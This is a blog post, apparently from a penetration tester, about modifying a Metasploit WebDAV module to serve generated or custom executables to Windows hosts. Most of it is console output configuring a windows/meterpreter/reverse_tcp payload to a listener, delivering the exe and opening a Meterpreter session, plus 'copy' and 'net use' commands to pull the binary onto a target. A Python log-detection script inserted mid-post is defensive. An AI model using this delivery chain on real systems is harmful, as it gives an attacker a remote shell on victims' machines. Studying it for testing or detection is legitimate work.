WebDAV Server to Download Custom Executable or MSF Generated Executables
The current module does not allow you to download exe's; in fact, these are specifically blacklisted. This makes sense because that's not what the exploit is for. Anyway, someone asked me if it was possible to download a file (specifically a pre-generated exe) over WebDAV. I know an auxiliary module to be a WebDAV server has been a request for a while, but it looked like the dll_hijacker module could accomplish it. I added a block of code to the process_get function to handle the exe and then removed .exe from the blacklist.
So if LOCALEXE is set to TRUE, the module serves up the local exe at the path/filename you specify; if not, it generates an executable based on the payload options (yes, I realize AV will essentially make this part useless).
Below is a "show options" with nothing set. The default is to generate an EXE payload; if you want to serve your own local EXE, you need to set LOCALEXE to TRUE.
```
msf exploit(webdav_file_server) > show options

Module options (exploit/windows/dev/webdav_file_server):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BASENAME    policy           yes       The base name for the listed files.
   EXTENSIONS  txt              yes       The list of extensions to generate
   LOCALEXE    false            yes       Use a local exe instead of generating one based on payload options
   LOCALFILE   myexe.exe        yes       The filename to serve up
   LOCALROOT   /tmp/            yes       The local file path
   SHARENAME   documents        yes       The name of the top-level share.
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The daemon port to listen on (do not change)
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH     /                yes       The URI to use (do not change).

Exploit target:

   Id  Name
   --  ----
   0   Automatic
```

```
msf exploit(webdav_file_server) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(webdav_file_server) > set LHOST 192.168.26.129
LHOST => 192.168.26.129
msf exploit(webdav_file_server) > set LPORT 5555
LPORT => 5555
msf exploit(webdav_file_server) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.26.129:5555
[*]
[*] Exploit links are now available at \\192.168.26.129\documents\
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.26.129:80/
[*] Server started.
msf exploit(webdav_file_server) > [*] 192.168.26.1:17904 OPTIONS /documents/myexe.exe
[*] 192.168.26.1:17904 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17904 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17904 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17904 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17904 PROPFIND /documents
[*] 192.168.26.1:17904 PROPFIND => 301 (/documents)
[*] 192.168.26.1:17904 PROPFIND /documents/
[*] 192.168.26.1:17904 PROPFIND => 207 Directory (/documents/)
[*] 192.168.26.1:17904 PROPFIND => 207 Top-Level Directory
[*] 192.168.26.1:17904 GET => Delivering Generated EXE Payload
```
**Manually execute the exe**
```
[*] Sending stage (752128 bytes) to 192.168.26.1
[*] Meterpreter session 1 opened (192.168.26.129:5555 -> 192.168.26.1:17800) at Thu May 17 23:13:29 -0700 2012
```
Now if you want to serve a local exe
```
msf exploit(webdav_file_server) > jobs -K
Stopping all jobs...
[*] Server stopped.
msf exploit(webdav_file_server) > set LOCALEXE TRUE
LOCALEXE => TRUE
msf exploit(webdav_file_server) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.26.129:5555
[*]
[*] Exploit links are now available at \\192.168.26.129\documents\
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.26.129:80/
[*] Server started.
msf exploit(webdav_file_server) > [*] 192.168.26.1:17870 OPTIONS /documents/myexe.exe
[*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17870 PROPFIND /documents
[*] 192.168.26.1:17870 PROPFIND => 301 (/documents)
[*] 192.168.26.1:17870 PROPFIND /documents/
[*] 192.168.26.1:17870 PROPFIND => 207 Directory (/documents/)
[*] 192.168.26.1:17870 PROPFIND => 207 Top-Level Directory
[*] 192.168.26.1:17870 GET => Delivering Local EXE Payload [ /tmp/myexe.exe ]
```
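The request sequence in the server output above (OPTIONS, PROPFIND, then a GET for an .exe) is also what a defender sees in proxy or web logs. The following Python is an added example, not part of the original post or the module: it flags a successful GET of an executable that follows WebDAV discovery from the same client to the same server. The log format, the function name `find_webdav_exe_fetches` and the sample lines are assumptions made for illustration; the `Microsoft-WebDAV-MiniRedir` User-Agent prefix is what the Windows WebClient service sends and does not appear on the page.

```python
import re

# Constructed proxy log lines in a hypothetical format:
#   time client server method path status "user-agent"
# The first flow reuses the addresses and path from the console output above.
SAMPLE_LOG = """\
2012-05-17T23:13:01 192.168.26.1 192.168.26.129 OPTIONS /documents/myexe.exe 200 "Microsoft-WebDAV-MiniRedir/6.1.7601"
2012-05-17T23:13:01 192.168.26.1 192.168.26.129 PROPFIND /documents/myexe.exe 207 "Microsoft-WebDAV-MiniRedir/6.1.7601"
2012-05-17T23:13:02 192.168.26.1 192.168.26.129 PROPFIND /documents/ 207 "Microsoft-WebDAV-MiniRedir/6.1.7601"
2012-05-17T23:13:02 192.168.26.1 192.168.26.129 GET /documents/myexe.exe 200 "Microsoft-WebDAV-MiniRedir/6.1.7601"
2012-05-17T23:14:10 10.0.0.34 198.51.100.7 GET /downloads/setup.exe 200 "Mozilla/5.0"
2012-05-17T23:15:44 10.0.0.40 192.0.2.9 PROPFIND /share/report.docx 207 "Microsoft-WebDAV-MiniRedir/6.1.7601"
2012-05-17T23:15:45 10.0.0.40 192.0.2.9 GET /share/report.docx 200 "Microsoft-WebDAV-MiniRedir/6.1.7601"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')
EXEC_EXT = (".exe", ".dll", ".scr")      # file types worth alerting on
DAV_METHODS = {"OPTIONS", "PROPFIND"}    # WebDAV discovery seen before the GET
MINIREDIR = "microsoft-webdav-miniredir"  # Windows WebClient User-Agent prefix


def find_webdav_exe_fetches(log_text):
    """Return one alert per successful GET of an executable that either
    follows OPTIONS/PROPFIND on the same client->server flow or carries
    the WebDAV mini-redirector User-Agent."""
    dav_flows = set()
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that do not fit the assumed format
        ts, client, server, method, path, status, ua = m.groups()
        flow = (client, server)
        if method in DAV_METHODS:
            dav_flows.add(flow)
            continue
        is_exec = path.split("?", 1)[0].lower().endswith(EXEC_EXT)
        via_dav = flow in dav_flows or MINIREDIR in ua.lower()
        if method == "GET" and status == "200" and is_exec and via_dav:
            alerts.append({"time": ts, "client": client, "server": server,
                           "path": path, "user_agent": ua})
    return alerts


if __name__ == "__main__":
    for alert in find_webdav_exe_fetches(SAMPLE_LOG):
        print(alert)
```

The browser download of `setup.exe` and the WebDAV fetch of `report.docx` in the sample are deliberately not flagged, which keeps the rule narrow enough to run against outbound proxy logs.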
I've tested this on Windows 7 and Windows XP, and I've been told this works with IE7 and below but not IE8. I've just been executing it on the command line.
Usage*:
copy \\ip\documents\myexe.exe myexe.exe
You may have to net use first
net use \\ip\documents\ /User:Guest
You'll see Windows attempt the request over SMB, fail, then switch to doing the WebDAV thing.
Once the bin is on the box you can exec the bin manually.
*There are a couple of other ways to run this; the guy that asked me to help with all this will have a post on it soon.
Code is HERE in the GitHub repo; be gentle, I don't usually do exploit code...
-CG